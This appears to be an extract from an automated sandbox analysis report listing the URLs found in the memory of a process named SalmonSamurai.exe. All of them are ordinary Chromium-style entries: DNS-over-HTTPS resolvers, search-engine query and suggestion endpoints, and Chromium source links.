Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.quad9.net/dns-querydns.quad9.netdns9.quad9.net9.9.9.9149.112.112.1122620:fe::fe2620:fe::
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.sb/privacy/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10;
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cox.net/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30Z
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.familyshield.opendns.com/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.xfinity.com/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabh
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/favicon.icohttps://es.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fi.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fi.search.yahoo.com/favicon.icohttps://fi.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fi.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/favicon.icohttps://fr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Docs/issues/1005)
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://go.imgsmail.ru/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?p=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/favicon.icohttps://searchatlas.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/favicon.icohttps://sg.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.icohttps://www.ask.com/web?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.icohttps://search.naver.com/search.nav
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://storage.ape.yandex.net/get/browser/Doodles/yandex/drawable-xxhdpi/yandex.png
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suche.gmx.at/web/result?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suche.gmx.net/web/result?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sug.so.360.cn/suggest?encodein=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.search.daum.net/sushi/opensearch/pc?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.seznam.cz/fulltext_ff?phrase=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.seznam.sk/fulltext_ff?phrase=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.com.tr/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.com/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestion.baidu.com/su?wd=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.at/s?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.co.uk/s?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.com/s?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.es/s?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.fr/s?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.net/s?q=
